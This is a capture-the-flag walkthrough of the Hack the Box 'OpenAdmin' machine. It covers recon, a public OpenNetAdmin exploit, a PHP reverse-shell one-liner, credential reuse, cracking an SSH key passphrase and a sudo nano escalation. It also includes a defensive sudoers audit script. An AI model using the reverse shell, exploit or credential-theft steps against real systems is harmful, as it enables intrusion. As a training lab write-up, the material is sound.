Hack the Box – OpenAdmin Walkthrough

Today, we’re going to solve another CTF machine, OpenAdmin. It is now a retired box and is accessible to VIP members.


  • Target OS : Linux
  • Services : SSH, HTTP
  • IP Address :
  • Difficulty : Easy


  • Getting user
  • Getting root


As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -oA

Enumerating Port 80

By running gobuster we found the /music and /artwork directories, both with a 301 status code.

gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u -s '200,204,301,302,307,403,500' -e | tee '/root/htb/'

Enumerating Music Directory

If we browse URL

If we click on login, we find that OpenNetAdmin is installed.

Let’s enumerate OpenNetAdmin and Google what it really is.


There’s an OpenNetAdmin installed


Since our target version of OpenNetAdmin is 18.1.1, we found two exploits for it.

Let’s copy one with searchsploit -m exploits/php/webapps/47691.sh.

I tried to run the exploit, but it didn’t work for some reason.

I had to dos2unix 47691.sh


And we got a low-privilege shell.

By going through the ONA config file we found database creds.



        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',


Let’s try getting a proper shell first.

I tried every reverse shell such as Perl, Python, and bash; none of them worked for me.

I did wget p0wny-shell, uploaded it, and got a reverse shell that way.

php -r '$sock=fsockopen("",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

And got a reverse shell instantly.


nc ls

Seems like we don’t have permission to access either of the directories.

If you remember, we had an SQL database; let’s dump it.

We don’t have access to SQL, and SQLDump isn’t installed either.

There’s a reused password for jimmy.

Let’s SSH in as jimmy with the SQL creds we found.

ssh jimmy@ 

After doing some enumeration and looking for something interesting, we got it!

If you take a look at main.php, you’ll see it’s our way to get joanna’s SSH private key. But we don’t know where it’s hosted, so let’s take a look at the Apache config.


If you take a look at internal.conf, you’ll see it’s running on port 52846. Let’s check whether that port is open for us.

Seems like it’s only open to the local network, but luckily we’re already on the network.

curl localhost:52846/main.php

And we got joanna’s private SSH key.

Let’s crack it using quarantin/rsakey-cracker from GitHub, a tool to brute-force the passphrase of an RSA private key in PEM format.

And we got the password!


Let’s SSH in as joanna.

ssh -i key joanna@ - bloodninjas

Now that we’re logged in as joanna, let’s do some enumeration.


Privilege Escalation

If we do sudo -l, we see the following:

joanna can run nano on /opt/priv through sudo without a password.

Run sudo /bin/nano /opt/priv to enter the nano editor.
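From the defender's side, the sudo rule above is the finding to remediate. The script below is an added example, not part of the original walkthrough: it flags NOPASSWD sudoers rules that grant an interactive editor or pager. The sample sudoers text and the list of program names are constructed assumptions.

```shell
#!/bin/sh
# Added example: audit sudoers text for passwordless rules that hand out
# an interactive editor or pager. Such a program runs as the target user
# for the whole session and is not confined to the file named in the rule.

# Constructed sample sudoers content (not copied from the box).
SAMPLE_SUDOERS='# constructed sample
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app, /usr/bin/less /var/log/app.log
%admin  ALL=(ALL) ALL'

# Assumed list of interactive programs; extend it for your environment.
INTERACTIVE='nano vi vim view ed emacs less more man'

# Reads sudoers text on stdin, prints "principal<TAB>command" per finding.
# Limitation: Cmnd_Alias names are not expanded.
audit_sudoers() {
  awk -v progs="$INTERACTIVE" '
    BEGIN { n = split(progs, p, " "); for (i = 1; i <= n; i++) risky[p[i]] = 1 }
    /^[ \t]*#/   { next }                    # comments and #include lines
    !/NOPASSWD:/ { next }                    # only passwordless rules
    {
      principal = $1
      cmds = $0
      sub(/^.*NOPASSWD:[ \t]*/, "", cmds)    # keep only the command list
      m = split(cmds, c, /[ \t]*,[ \t]*/)
      for (j = 1; j <= m; j++) {
        split(c[j], w, /[ \t]+/)             # w[1] is the binary path
        k = split(w[1], parts, "/")          # parts[k] is its basename
        if (parts[k] in risky) printf "%s\t%s\n", principal, c[j]
      }
    }'
}

# Demo on the constructed sample; on a real host, feed it the contents of
# /etc/sudoers and /etc/sudoers.d/* (root is needed to read them).
printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
```

Each reported rule is a candidate for replacement with sudoedit or a non-interactive wrapper that performs only the intended action.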


It is simple and easy to understand, thank you.